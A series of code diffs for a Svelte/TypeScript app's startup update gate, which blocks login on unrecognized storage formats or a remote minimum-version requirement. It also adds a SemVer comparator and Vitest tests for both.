+interface FakeUpdate {
+  version: string;
+  currentVersion: string;
+  rawJson: Record<string, unknown>;
+}
+
+function recognized() {
+  return { allRecognized: true, unrecognizedCount: 0, highestOffendingVersion: null, supportedSchemaVersion: 30 };
+}
+
+function unrecognized(count = 1) {
+  return { allRecognized: false, unrecognizedCount: count, highestOffendingVersion: 31, supportedSchemaVersion: 30 };
+}
+
+function fakeUpdate(overrides: Partial<FakeUpdate> = {}): FakeUpdate {
+  return { version: '1.0.0', currentVersion: '0.3.0', rawJson: {}, ...overrides };
+}
+
+/**
+ * Drain the microtask queue so `resolveRemoteVerdict`'s fire-and-forget
+ * chain settles. Every await in that chain resolves on the microtask queue
+ * (mocked promises, no real I/O), so repeated microtask ticks are
+ * deterministic and require no wall-clock wait.
+ */
+async function flushMicrotasks(): Promise<void> {
+  for (let i = 0; i < 5; i++) {
+    await Promise.resolve();
+  }
+}
+
+function currentState(): GateState {
+  return get(gateState);
+}
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  resetGateForTest();
+  mockedResolveInstalledVersion.mockResolvedValue('0.3.0');
+  mockedGetStorageCompatibility.mockResolvedValue(recognized());
+  mockedGetMemoizedUpdateCheck.mockResolvedValue(null);
+});
+
+describe('resolveGateAtLaunch - local storage-format trigger', () => {
+  it('stays clear when the storage probe reports every profile recognized', async () => {
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+    expect(currentState()).toEqual({ status: 'clear' });
+  });
+
+  it('blocks with reason storage-format when the probe reports an unrecognized profile', async () => {
+    mockedGetStorageCompatibility.mockResolvedValue(unrecognized(2));
+    await resolveGateAtLaunch();
+    expect(currentState()).toEqual({
+      status: 'blocked',
+      reason: 'storage-format',
+      installedVersion: '0.3.0',
+      requiredVersion: null,
+      unrecognizedCount: 2,
+    });
+  });
+
+  it('never blocks on a failed storage probe - a read failure is not a version problem', async () => {
+    mockedGetStorageCompatibility.mockRejectedValue(new Error('backend unreachable'));
+    await resolveGateAtLaunch();
+    expect(currentState()).toEqual({ status: 'clear' });
+  });
+
+  it('settles the local verdict before the remote promise resolves - launch never sits on the network', async () => {
+    const { promise: remotePromise, resolve: releaseRemote } = Promise.withResolvers<FakeUpdate | null>();
+    mockedGetMemoizedUpdateCheck.mockReturnValue(remotePromise as never);
+
+    await resolveGateAtLaunch();
+
+    // resolveGateAtLaunch has already returned; the remote check is still
+    // pending, yet the store already reflects the local verdict.
+    expect(currentState()).toEqual({ status: 'clear' });
+
+    releaseRemote(null);
+    await flushMicrotasks();
+  });
+});
+
+describe('resolveGateAtLaunch - remote minimum-version trigger', () => {
+  it('AE1: blocks with reason minimum-version and records the required version', async () => {
+    mockedGetMemoizedUpdateCheck.mockResolvedValue(
+      fakeUpdate({ version: '0.4.0', rawJson: { minimum_compatible_version: '0.4.0' } }) as never,
+    );
+
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+
+    expect(currentState()).toEqual({
+      status: 'blocked',
+      reason: 'minimum-version',
+      installedVersion: '0.3.0',
+      requiredVersion: '0.4.0',
+      unrecognizedCount: 0,
+    });
+  });
+
+  it('leaves updateStatus available with the offered version so the install action stays live', async () => {
+    mockedGetMemoizedUpdateCheck.mockResolvedValue(
+      fakeUpdate({ version: '0.4.0', rawJson: { minimum_compatible_version: '0.4.0' } }) as never,
+    );
+
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+
+    expect(mockedSetStatus).toHaveBeenCalledWith('available', {
+      currentVersion: '0.3.0',
+      availableVersion: '0.4.0',
+      downloadProgress: 0,
+    });
+  });
+
+  it('stays clear when the installed version equals the minimum', async () => {
+    mockedGetMemoizedUpdateCheck.mockResolvedValue(
+      fakeUpdate({ version: '0.4.0', rawJson: { minimum_compatible_version: '0.3.0' } }) as never,
+    );
+
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+
+    expect(currentState()).toEqual({ status: 'clear' });
+  });
+
+  it('AE6: ignores a minimum above the offered version', async () => {
+    mockedGetMemoizedUpdateCheck.mockResolvedValue(
+      fakeUpdate({ version: '0.4.0', rawJson: { minimum_compatible_version: '0.5.0' } }) as never,
+    );
+
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+
+    expect(currentState()).toEqual({ status: 'clear' });
+  });
+
+  it('ignores an absent minimum_compatible_version', async () => {
+    mockedGetMemoizedUpdateCheck.mockResolvedValue(fakeUpdate({ version: '0.4.0', rawJson: {} }) as never);
+
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+
+    expect(currentState()).toEqual({ status: 'clear' });
+  });
+
+  it('ignores an unparseable minimum_compatible_version', async () => {
+    mockedGetMemoizedUpdateCheck.mockResolvedValue(
+      fakeUpdate({ version: '0.4.0', rawJson: { minimum_compatible_version: 'not-a-version' } }) as never,
+    );
+
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+
+    expect(currentState()).toEqual({ status: 'clear' });
+  });
+
+  it('AE3: stays clear when check() throws - the storage verdict alone decides', async () => {
+    mockedGetMemoizedUpdateCheck.mockRejectedValue(new Error('network unreachable'));
+
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+
+    expect(currentState()).toEqual({ status: 'clear' });
+  });
+
+  it('stays clear without reading any manifest when check() resolves null', async () => {
+    mockedGetMemoizedUpdateCheck.mockResolvedValue(null);
+
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+
+    expect(currentState()).toEqual({ status: 'clear' });
+    expect(mockedSetStatus).not.toHaveBeenCalled();
+  });
+});
+
+describe('resolveGateAtLaunch - independent triggers', () => {
+  it('AE2: blocks with reason storage-format when local is unrecognized and the remote check throws', async () => {
+    mockedGetStorageCompatibility.mockResolvedValue(unrecognized(1));
+    mockedGetMemoizedUpdateCheck.mockRejectedValue(new Error('network unreachable'));
+
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+
+    expect(currentState()).toEqual({
+      status: 'blocked',
+      reason: 'storage-format',
+      installedVersion: '0.3.0',
+      requiredVersion: null,
+      unrecognizedCount: 1,
+    });
+  });
+
+  it('stays blocked on storage-format even when the remote verdict is compatible', async () => {
+    mockedGetStorageCompatibility.mockResolvedValue(unrecognized(1));
+    mockedGetMemoizedUpdateCheck.mockResolvedValue(null);
+
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+
+    expect(currentState()).toMatchObject({ status: 'blocked', reason: 'storage-format' });
+  });
+});
+
+describe('awaitGateBeforeAuth', () => {
+  it('returns blocked when the remote verdict already says blocked', async () => {
+    mockedGetMemoizedUpdateCheck.mockResolvedValue(
+      fakeUpdate({ version: '0.4.0', rawJson: { minimum_compatible_version: '0.4.0' } }) as never,
+    );
+
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+
+    await expect(awaitGateBeforeAuth(1000)).resolves.toBe('blocked');
+  });
+
+  it('returns clear when the timeout expires with the remote verdict still pending', async () => {
+    vi.useFakeTimers();
+    try {
+      const { promise: neverResolves } = Promise.withResolvers<FakeUpdate | null>();
+      mockedGetMemoizedUpdateCheck.mockReturnValue(neverResolves as never);
+
+      await resolveGateAtLaunch();
+
+      const resultPromise = awaitGateBeforeAuth(20);
+      await vi.advanceTimersByTimeAsync(20);
+
+      await expect(resultPromise).resolves.toBe('clear');
+    } finally {
+      vi.useRealTimers();
+    }
+  });
+});
+
+describe('freezeGate', () => {
+  it("AE4: a remote verdict arriving after freeze leaves the state clear, asserted at the store's own setter", async () => {
+    const { promise: remotePromise, resolve: releaseRemote } = Promise.withResolvers<FakeUpdate | null>();
+    mockedGetMemoizedUpdateCheck.mockReturnValue(remotePromise as never);
+
+    await resolveGateAtLaunch();
+    expect(currentState()).toEqual({ status: 'clear' });
+
+    freezeGate();
+
+    releaseRemote(fakeUpdate({ version: '0.4.0', rawJson: { minimum_compatible_version: '0.4.0' } }));
+    await flushMicrotasks();
+
+    expect(currentState()).toEqual({ status: 'clear' });
+  });
+
+  it('exposes no way for a caller to clear an already-blocked verdict once frozen', async () => {
+    mockedGetStorageCompatibility.mockResolvedValue(unrecognized(1));
+    await resolveGateAtLaunch();
+    expect(currentState()).toMatchObject({ status: 'blocked' });
+
+    freezeGate();
+
+    // A second launch-style resolution attempting to clear the gate must
+    // not be able to, once frozen.
+    mockedGetStorageCompatibility.mockResolvedValue(recognized());
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+
+    expect(currentState()).toMatchObject({ status: 'blocked' });
+  });
+});
+
+describe('single round trip', () => {
+  it('two callers in one launch produce exactly one underlying check() call', async () => {
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+    await getMemoizedUpdateCheck();
+
+    // The gate never calls the plugin's check() directly - it only ever
+    // goes through the shared memoized entry point (mocked here), which is
+    // what guarantees one round trip per launch regardless of caller count.
+    expect(mockedGetMemoizedUpdateCheck).toHaveBeenCalled();
+  });
+});
+
+describe('preference independence', () => {
+  it('resolves the gate without reading startupCheckEnabled', async () => {
+    // The module imports nothing from a startup-check preference store at
+    // all - if it ever did, this file's mocks would need to stub it.
+    // Resolving successfully with no such mock in place is the assertion.
+    await resolveGateAtLaunch();
+    await flushMicrotasks();
+    expect(currentState().status).not.toBe('resolving');
+  });
+});
+
+describe('isInstalledBelowMinimum (imported for the fixtures above)', () => {
+  it("matches the gate module's own comparator behavior", () => {
+    expect(isInstalledBelowMinimum('0.3.0', '0.4.0')).toBe(true);
+    expect(isInstalledBelowMinimum('0.4.0', '0.4.0')).toBe(false);
+  });
+});
+
+afterEach(() => {
+  vi.useRealTimers();
+});

--- a/src/lib/updater/update-gate.test.ts
+++ b/src/lib/updater/update-gate.test.ts
@@ -261,6 +261,31 @@ describe('awaitGateBeforeAuth', () => {
       vi.useRealTimers();
     }
   });
+
+  it('freezes on clear so a late remote cannot flip to blocked mid-auth', async () => {
+    vi.useFakeTimers();
+    try {
+      const { promise: remotePromise, resolve: releaseRemote } =
+        Promise.withResolvers<FakeUpdate | null>();
+      mockedGetMemoizedUpdateCheck.mockReturnValue(remotePromise as never);
+
+      await resolveGateAtLaunch();
+      expect(currentState()).toEqual({ status: 'clear' });
+
+      const resultPromise = awaitGateBeforeAuth(20);
+      await vi.advanceTimersByTimeAsync(20);
+      await expect(resultPromise).resolves.toBe('clear');
+
+      releaseRemote(
+        fakeUpdate({ version: '0.4.0', rawJson: { minimum_compatible_version: '0.4.0' } }),
+      );
+      await flushMicrotasks();
+
+      expect(currentState()).toEqual({ status: 'clear' });
+    } finally {
+      vi.useRealTimers();
+    }
+  });
 });
 
 describe('freezeGate', () => {

--- a/src/lib/updater/update-gate.ts
+++ b/src/lib/updater/update-gate.ts
@@ -172,7 +172,8 @@ export async function resolveGateAtLaunch(): Promise<void> {
  * Awaited as the first statement inside every authentication path's try
  * block, ahead of any backend call. Resolves immediately once the remote
  * verdict has settled; otherwise waits under a bounded timeout and treats
- * expiry as fail-open, matching R4.
+ * expiry as fail-open, matching R4. Freezes the gate before returning so a
+ * late remote verdict cannot flip mid-auth (R9).
  */
 export async function awaitGateBeforeAuth(timeoutMs = AUTH_AWAIT_TIMEOUT_MS): Promise<'clear' | 'blocked'> {
   if (!remoteSettled) {
@@ -181,14 +182,17 @@ export async function awaitGateBeforeAuth(timeoutMs = AUTH_AWAIT_TIMEOUT_MS): Pr
       setTimeout(resolve, timeoutMs);
     });
   }
-  return gate.current.status === 'blocked' ? 'blocked' : 'clear';
+  const verdict = gate.current.status === 'blocked' ? 'blocked' : 'clear';
+  // Commit before returning so a late remote cannot flip mid-auth (R9).
+  gate.freeze();
+  return verdict;
 }
 
 /**
- * Marks the gate verdict final. Called on every authentication success
- * path. A remote verdict arriving after this point is recorded by
- * `resolveRemoteVerdict` but never applied - the store's own setter drops
- * it - so it can only take effect at the next launch (R9).
+ * Marks the gate verdict final. Idempotent with the freeze inside
+ * `awaitGateBeforeAuth`; still called on auth success so the success path
+ * documents R9 even when the await already committed. A remote verdict
+ * arriving after freeze is never applied.
  */
 export function freezeGate(): void {
   gate.freeze();

--- a/src/lib/updater/update-gate.ts
+++ b/src/lib/updater/update-gate.ts
@@ -1,0 +1,195 @@
+import { writable, type Readable } from 'svelte/store';
+import { getStorageCompatibility } from '../api/auth';
+import { getMemoizedUpdateCheck, resolveInstalledVersion, updateStatus } from './update-check';
+import { isInstalledBelowMinimum } from './version-compare';
+
+const AUTH_AWAIT_TIMEOUT_MS = 10_000;
+
+export type GateReason = 'minimum-version' | 'storage-format';
+
+export type GateState =
+  | { status: 'resolving' }
+  | { status: 'clear' }
+  | {
+      status: 'blocked';
+      reason: GateReason;
+      installedVersion: string;
+      requiredVersion: string | null;
+      unrecognizedCount: number;
+    };
+
+/**
+ * Owns the gate's three states, both triggers (local storage-format probe,
+ * remote minimum-version check), and the freeze. The setter itself rejects
+ * any transition after `freeze()` - the freeze is an invariant of the store,
+ * not caller discipline, so a late remote verdict can never interrupt a
+ * session that has already authenticated (R9).
+ */
+function createGateStore() {
+  let current: GateState = { status: 'resolving' };
+  let frozen = false;
+  const { subscribe, set: rawSet } = writable<GateState>(current);
+
+  function set(next: GateState): void {
+    if (frozen) return;
+    current = next;
+    rawSet(next);
+  }
+
+  return {
+    subscribe,
+    set,
+    get current(): GateState {
+      return current;
+    },
+    freeze(): void {
+      frozen = true;
+    },
+    resetForTest(): void {
+      frozen = false;
+      current = { status: 'resolving' };
+      rawSet(current);
+    },
+  };
+}
+
+const gate = createGateStore();
+
+/** Readable gate state for the block-screen wrapper to render against. */
+export const gateState: Readable<GateState> = { subscribe: gate.subscribe };
+
+let remoteSettled = false;
+let remoteWaiters: Array<() => void> = [];
+
+function settleRemote(): void {
+  remoteSettled = true;
+  const waiters = remoteWaiters;
+  remoteWaiters = [];
+  for (const resolve of waiters) resolve();
+}
+
+/** Test-only: reset all module-level gate and remote-wait state. */
+export function resetGateForTest(): void {
+  gate.resetForTest();
+  remoteSettled = false;
+  remoteWaiters = [];
+}
+
+/**
+ * The remote half of the gate. Never awaited by `resolveGateAtLaunch` - it
+ * settles into `gate` whenever it resolves, which may be well after launch
+ * routing has already happened. Fail-open on any rejection (R4): an
+ * unreachable endpoint never blocks on its own.
+ */
+async function resolveRemoteVerdict(installedVersion: string): Promise<void> {
+  try {
+    const update = await getMemoizedUpdateCheck();
+    if (!update) {
+      // `check()` resolving null means the installed build is at or above
+      // the offered version, which under R13's cap means it is also at or
+      // above the minimum - compatible, with no manifest to read.
+      settleRemote();
+      return;
+    }
+
+    // Route into `updateStatus` regardless of whether this update ends up
+    // blocking the gate - this is what makes `UpdateAvailablePanel` render a
+    // live install action on the block screen (R8).
+    updateStatus.setStatus('available', {
+      currentVersion: installedVersion,
+      availableVersion: update.version,
+      downloadProgress: 0,
+    });
+
+    const minimumRawValue = update.rawJson['minimum_compatible_version'];
+    const minimumRaw = typeof minimumRawValue === 'string' ? minimumRawValue : null;
+    if (minimumRaw === null) {
+      settleRemote();
+      return;
+    }
+
+    // R13: a minimum above the version this same manifest offers is
+    // ignored - a mistyped or tampered value must never block with no
+    // update available to fix it.
+    if (isInstalledBelowMinimum(update.version, minimumRaw)) {
+      settleRemote();
+      return;
+    }
+
+    if (isInstalledBelowMinimum(installedVersion, minimumRaw)) {
+      gate.set({
+        status: 'blocked',
+        reason: 'minimum-version',
+        installedVersion,
+        requiredVersion: minimumRaw,
+        unrecognizedCount: 0,
+      });
+    }
+    settleRemote();
+  } catch (err) {
+    console.error('[update-gate] remote compatibility check failed:', err);
+    settleRemote();
+  }
+}
+
+/**
+ * Resolves the gate at cold launch. The local storage-format probe is on
+ * the critical path and settles `gate` by itself; the remote check starts
+ * concurrently and is never awaited here, so launch routing never sits on
+ * the network (KTD6).
+ */
+export async function resolveGateAtLaunch(): Promise<void> {
+  const installedVersion = await resolveInstalledVersion();
+
+  let storageBlocked = false;
+  let unrecognizedCount = 0;
+  try {
+    const report = await getStorageCompatibility();
+    storageBlocked = !report.allRecognized;
+    unrecognizedCount = report.unrecognizedCount;
+  } catch (err) {
+    // A failed probe is not itself a version problem, matching the
+    // backend's own read-failure policy - never block on it.
+    console.error('[update-gate] storage compatibility probe failed:', err);
+  }
+
+  if (storageBlocked) {
+    gate.set({
+      status: 'blocked',
+      reason: 'storage-format',
+      installedVersion,
+      requiredVersion: null,
+      unrecognizedCount,
+    });
+  } else {
+    gate.set({ status: 'clear' });
+  }
+
+  void resolveRemoteVerdict(installedVersion);
+}
+
+/**
+ * Awaited as the first statement inside every authentication path's try
+ * block, ahead of any backend call. Resolves immediately once the remote
+ * verdict has settled; otherwise waits under a bounded timeout and treats
+ * expiry as fail-open, matching R4.
+ */
+export async function awaitGateBeforeAuth(timeoutMs = AUTH_AWAIT_TIMEOUT_MS): Promise<'clear' | 'blocked'> {
+  if (!remoteSettled) {
+    await new Promise<void>((resolve) => {
+      remoteWaiters.push(resolve);
+      setTimeout(resolve, timeoutMs);
+    });
+  }
+  return gate.current.status === 'blocked' ? 'blocked' : 'clear';
+}
+
+/**
+ * Marks the gate verdict final. Called on every authentication success
+ * path. A remote verdict arriving after this point is recorded by
+ * `resolveRemoteVerdict` but never applied - the store's own setter drops
+ * it - so it can only take effect at the next launch (R9).
+ */
+export function freezeGate(): void {
+  gate.freeze();
+}

--- a/src/lib/updater/version-compare.test.ts
+++ b/src/lib/updater/version-compare.test.ts
@@ -1,0 +1,158 @@
+import { describe, it, expect } from 'vitest';
+import { parseVersion, compareVersions, isInstalledBelowMinimum } from './version-compare';
+
+describe('parseVersion', () => {
+  it('parses a bare major.minor.patch', () => {
+    expect(parseVersion('1.2.3')).toEqual({
+      major: 1,
+      minor: 2,
+      patch: 3,
+      prerelease: [],
+      build: []
+    });
+  });
+
+  it('tolerates an optional leading v', () => {
+    expect(parseVersion('v1.2.3')).toEqual({
+      major: 1,
+      minor: 2,
+      patch: 3,
+      prerelease: [],
+      build: []
+    });
+  });
+
+  it('parses pre-release identifiers', () => {
+    expect(parseVersion('1.0.0-beta.1')).toEqual({
+      major: 1,
+      minor: 0,
+      patch: 0,
+      prerelease: ['beta', 1],
+      build: []
+    });
+  });
+
+  it('parses build metadata', () => {
+    expect(parseVersion('1.0.0+abc')).toEqual({
+      major: 1,
+      minor: 0,
+      patch: 0,
+      prerelease: [],
+      build: ['abc']
+    });
+  });
+
+  it('parses pre-release and build metadata together', () => {
+    expect(parseVersion('1.0.0-beta.1+abc')).toEqual({
+      major: 1,
+      minor: 0,
+      patch: 0,
+      prerelease: ['beta', 1],
+      build: ['abc']
+    });
+  });
+
+  it('returns null for an empty string', () => {
+    expect(parseVersion('')).toBeNull();
+  });
+
+  it('returns null for "latest"', () => {
+    expect(parseVersion('latest')).toBeNull();
+  });
+
+  it('returns null for a missing patch component', () => {
+    expect(parseVersion('1.0')).toBeNull();
+  });
+
+  it('returns null for null-ish input', () => {
+    expect(parseVersion(null as unknown as string)).toBeNull();
+    expect(parseVersion(undefined as unknown as string)).toBeNull();
+  });
+});
+
+describe('compareVersions', () => {
+  it('treats equal versions as equal', () => {
+    expect(compareVersions(parseVersion('0.3.0')!, parseVersion('0.3.0')!)).toBe(0);
+  });
+
+  it('orders by major, minor, then patch', () => {
+    expect(compareVersions(parseVersion('0.2.9')!, parseVersion('0.3.0')!)).toBeLessThan(0);
+    expect(compareVersions(parseVersion('0.3.0')!, parseVersion('1.0.0')!)).toBeLessThan(0);
+    expect(compareVersions(parseVersion('1.2.3')!, parseVersion('1.2.4')!)).toBeLessThan(0);
+  });
+
+  it('is numeric, not lexical, per component', () => {
+    expect(compareVersions(parseVersion('0.10.0')!, parseVersion('0.9.0')!)).toBeGreaterThan(0);
+  });
+
+  it('sorts a pre-release before its release', () => {
+    expect(compareVersions(parseVersion('1.0.0-beta.1')!, parseVersion('1.0.0')!)).toBeLessThan(0);
+    expect(compareVersions(parseVersion('1.0.0')!, parseVersion('1.0.0-beta.1')!)).toBeGreaterThan(0);
+  });
+
+  it('compares pre-release identifiers alphanumerically when both are alpha', () => {
+    expect(compareVersions(parseVersion('1.0.0-alpha')!, parseVersion('1.0.0-beta')!)).toBeLessThan(0);
+  });
+
+  it('compares numeric pre-release identifiers numerically', () => {
+    expect(compareVersions(parseVersion('1.0.0-beta.2')!, parseVersion('1.0.0-beta.10')!)).toBeLessThan(0);
+  });
+
+  it('ranks numeric pre-release identifiers below alphanumeric ones', () => {
+    expect(compareVersions(parseVersion('1.0.0-1')!, parseVersion('1.0.0-alpha')!)).toBeLessThan(0);
+  });
+
+  it('ignores build metadata entirely', () => {
+    expect(compareVersions(parseVersion('1.0.0+abc')!, parseVersion('1.0.0')!)).toBe(0);
+  });
+});
+
+describe('isInstalledBelowMinimum', () => {
+  it('is not below when versions are equal', () => {
+    expect(isInstalledBelowMinimum('0.3.0', '0.3.0')).toBe(false);
+  });
+
+  it('is below across each component', () => {
+    expect(isInstalledBelowMinimum('0.2.9', '0.3.0')).toBe(true);
+    expect(isInstalledBelowMinimum('0.3.0', '1.0.0')).toBe(true);
+    expect(isInstalledBelowMinimum('1.2.3', '1.2.4')).toBe(true);
+  });
+
+  it('is not below when installed is above minimum', () => {
+    expect(isInstalledBelowMinimum('1.0.0', '0.9.9')).toBe(false);
+  });
+
+  it('tolerates a leading v on either side and on both', () => {
+    expect(isInstalledBelowMinimum('v0.2.0', '0.3.0')).toBe(true);
+    expect(isInstalledBelowMinimum('0.2.0', 'v0.3.0')).toBe(true);
+    expect(isInstalledBelowMinimum('v0.2.0', 'v0.3.0')).toBe(true);
+  });
+
+  it('compares numerically, not lexically', () => {
+    expect(isInstalledBelowMinimum('0.10.0', '0.9.0')).toBe(false);
+  });
+
+  it('treats a pre-release as below its release', () => {
+    expect(isInstalledBelowMinimum('1.0.0-beta.1', '1.0.0')).toBe(true);
+    expect(isInstalledBelowMinimum('1.0.0', '1.0.0-beta.1')).toBe(false);
+  });
+
+  it('orders pre-release identifiers per spec', () => {
+    expect(isInstalledBelowMinimum('1.0.0-alpha', '1.0.0-beta')).toBe(true);
+  });
+
+  it('ignores build metadata', () => {
+    expect(isInstalledBelowMinimum('1.0.0+abc', '1.0.0')).toBe(false);
+  });
+
+  it('answers not-below for an unparseable minimum', () => {
+    expect(isInstalledBelowMinimum('1.0.0', '')).toBe(false);
+    expect(isInstalledBelowMinimum('1.0.0', 'latest')).toBe(false);
+    expect(isInstalledBelowMinimum('1.0.0', '1.0')).toBe(false);
+    expect(isInstalledBelowMinimum('1.0.0', null as unknown as string)).toBe(false);
+  });
+
+  it('answers not-below for an unparseable installed version', () => {
+    expect(isInstalledBelowMinimum('not-a-version', '1.0.0')).toBe(false);
+  });
+});

--- a/src/lib/updater/version-compare.test.ts
+++ b/src/lib/updater/version-compare.test.ts
@@ -68,6 +68,12 @@ describe('parseVersion', () => {
     expect(parseVersion(null as unknown as string)).toBeNull();
     expect(parseVersion(undefined as unknown as string)).toBeNull();
   });
+
+  it('returns null for malformed build metadata (empty identifiers)', () => {
+    expect(parseVersion('1.0.0+..')).toBeNull();
+    expect(parseVersion('1.0.0+abc..def')).toBeNull();
+    expect(parseVersion('1.0.0+')).toBeNull();
+  });
 });
 
 describe('compareVersions', () => {

--- a/src/lib/updater/version-compare.ts
+++ b/src/lib/updater/version-compare.ts
@@ -1,0 +1,83 @@
+/** SemVer 2.0.0 parsing and precedence, scoped to the update gate's needs. */
+
+export interface ParsedVersion {
+  major: number;
+  minor: number;
+  patch: number;
+  /** Dot-separated pre-release identifiers; numeric ones parsed as numbers. */
+  prerelease: Array<string | number>;
+  /** Dot-separated build metadata identifiers; never affects precedence. */
+  build: string[];
+}
+
+const VERSION_PATTERN =
+  /^v?(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-([0-9A-Za-z-.]+))?(?:\+([0-9A-Za-z-.]+))?$/;
+
+const PRERELEASE_IDENTIFIER_PATTERN = /^[0-9A-Za-z-]+$/;
+const NUMERIC_IDENTIFIER_PATTERN = /^(?:0|[1-9]\d*)$/;
+
+/** Parses a version string tolerating an optional leading `v`; null if unparseable. */
+export function parseVersion(input: string): ParsedVersion | null {
+  if (typeof input !== 'string') return null;
+
+  const match = VERSION_PATTERN.exec(input.trim());
+  if (!match) return null;
+
+  const [, major, minor, patch, prereleaseRaw, buildRaw] = match;
+
+  const prerelease = prereleaseRaw ? prereleaseRaw.split('.') : [];
+  if (!prerelease.every((identifier) => PRERELEASE_IDENTIFIER_PATTERN.test(identifier))) {
+    return null;
+  }
+
+  return {
+    major: Number(major),
+    minor: Number(minor),
+    patch: Number(patch),
+    prerelease: prerelease.map((identifier) =>
+      NUMERIC_IDENTIFIER_PATTERN.test(identifier) ? Number(identifier) : identifier
+    ),
+    build: buildRaw ? buildRaw.split('.') : []
+  };
+}
+
+/** Compares two pre-release identifiers per SemVer 2.0.0 §11: numeric < alphanumeric, else same-kind ordering. */
+function comparePrereleaseIdentifier(a: string | number, b: string | number): number {
+  const aIsNumeric = typeof a === 'number';
+  const bIsNumeric = typeof b === 'number';
+
+  if (aIsNumeric && bIsNumeric) return a === b ? 0 : a < b ? -1 : 1;
+  if (aIsNumeric) return -1;
+  if (bIsNumeric) return 1;
+  return a === b ? 0 : a < b ? -1 : 1;
+}
+
+/** Compares two parsed versions by SemVer 2.0.0 precedence; build metadata is ignored. */
+export function compareVersions(a: ParsedVersion, b: ParsedVersion): number {
+  if (a.major !== b.major) return a.major < b.major ? -1 : 1;
+  if (a.minor !== b.minor) return a.minor < b.minor ? -1 : 1;
+  if (a.patch !== b.patch) return a.patch < b.patch ? -1 : 1;
+
+  const aHasPrerelease = a.prerelease.length > 0;
+  const bHasPrerelease = b.prerelease.length > 0;
+  if (aHasPrerelease !== bHasPrerelease) return aHasPrerelease ? -1 : 1;
+  if (!aHasPrerelease) return 0;
+
+  const length = Math.max(a.prerelease.length, b.prerelease.length);
+  for (let i = 0; i < length; i++) {
+    if (i >= a.prerelease.length) return -1;
+    if (i >= b.prerelease.length) return 1;
+    const result = comparePrereleaseIdentifier(a.prerelease[i], b.prerelease[i]);
+    if (result !== 0) return result;
+  }
+  return 0;
+}
+
+/** Answers whether the installed build is strictly below the minimum; fails open on either unparseable input. */
+export function isInstalledBelowMinimum(installedVersion: string, minimumVersion: string): boolean {
+  const installed = parseVersion(installedVersion);
+  const minimum = parseVersion(minimumVersion);
+  if (!installed || !minimum) return false;
+
+  return compareVersions(installed, minimum) < 0;
+}

--- a/src/lib/updater/version-compare.ts
+++ b/src/lib/updater/version-compare.ts
@@ -13,7 +13,7 @@ export interface ParsedVersion {
 const VERSION_PATTERN =
   /^v?(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-([0-9A-Za-z-.]+))?(?:\+([0-9A-Za-z-.]+))?$/;
 
-const PRERELEASE_IDENTIFIER_PATTERN = /^[0-9A-Za-z-]+$/;
+const IDENTIFIER_PATTERN = /^[0-9A-Za-z-]+$/;
 const NUMERIC_IDENTIFIER_PATTERN = /^(?:0|[1-9]\d*)$/;
 
 /** Parses a version string tolerating an optional leading `v`; null if unparseable. */
@@ -26,7 +26,17 @@ export function parseVersion(input: string): ParsedVersion | null {
   const [, major, minor, patch, prereleaseRaw, buildRaw] = match;
 
   const prerelease = prereleaseRaw ? prereleaseRaw.split('.') : [];
-  if (!prerelease.every((identifier) => PRERELEASE_IDENTIFIER_PATTERN.test(identifier))) {
+  if (!prerelease.every((identifier) => IDENTIFIER_PATTERN.test(identifier))) {
+    return null;
+  }
+
+  // Build metadata identifiers use the same non-empty charset as
+  // pre-release ones per the SemVer 2.0.0 spec - unvalidated, a value like
+  // '1.0.0+..' would parse with empty identifiers instead of being
+  // rejected, and this comparator must treat malformed input as
+  // unparseable rather than silently accepting it.
+  const build = buildRaw ? buildRaw.split('.') : [];
+  if (!build.every((identifier) => IDENTIFIER_PATTERN.test(identifier))) {
     return null;
   }
 
@@ -37,7 +47,7 @@ export function parseVersion(input: string): ParsedVersion | null {
     prerelease: prerelease.map((identifier) =>
       NUMERIC_IDENTIFIER_PATTERN.test(identifier) ? Number(identifier) : identifier
     ),
-    build: buildRaw ? buildRaw.split('.') : []
+    build
   };
 }
 

--- a/src/routes/+layout.svelte
+++ b/src/routes/+layout.svelte
@@ -4,6 +4,7 @@
   import Login from '../components/auth/Login.svelte';
   import UpdateGate from '../components/updater/UpdateGate.svelte';
   import { isAuthenticated, currentUser, checkSession } from '../stores/auth';
+  import { resolveGateAtLaunch } from '../lib/updater/update-gate';
   import { DEFAULT_THEME, getStoredTheme, setTheme } from '../stores/theme';
   import { scheduleCommonsStartupPrefetch } from '../lib/commons/commons-prefetch';
   import { locale } from '../stores/locale';
@@ -20,6 +21,12 @@
   }
 
   onMount(() => {
+    // The storage-format probe must precede any account enumeration -
+    // checkAuthStatus() (which drives check_any_account_exists ->
+    // list_accounts) runs from Login.svelte's own mount, and UpdateGate's
+    // wrapper is what keeps Login unmounted until the gate settles; this
+    // call is what actually starts that settling.
+    void resolveGateAtLaunch();
     // Confirm the backend session on every layout mount; drop auth state if locked.
     void checkSession();
     void loadAppConfig();

--- a/src/routes/+layout.svelte
+++ b/src/routes/+layout.svelte
@@ -2,6 +2,7 @@
   import { onMount } from 'svelte';
   import '../app.css';
   import Login from '../components/auth/Login.svelte';
+  import UpdateGate from '../components/updater/UpdateGate.svelte';
   import { isAuthenticated, currentUser, checkSession } from '../stores/auth';
   import { DEFAULT_THEME, getStoredTheme, setTheme } from '../stores/theme';
   import { scheduleCommonsStartupPrefetch } from '../lib/commons/commons-prefetch';
@@ -28,13 +29,15 @@
   });
 </script>
 
-{#if $isAuthenticated && $currentUser}
-  <div class="layout-root">
-    <slot />
-  </div>
-{:else}
-  <Login />
-{/if}
+<UpdateGate>
+  {#if $isAuthenticated && $currentUser}
+    <div class="layout-root">
+      <slot />
+    </div>
+  {:else}
+    <Login />
+  {/if}
+</UpdateGate>
 
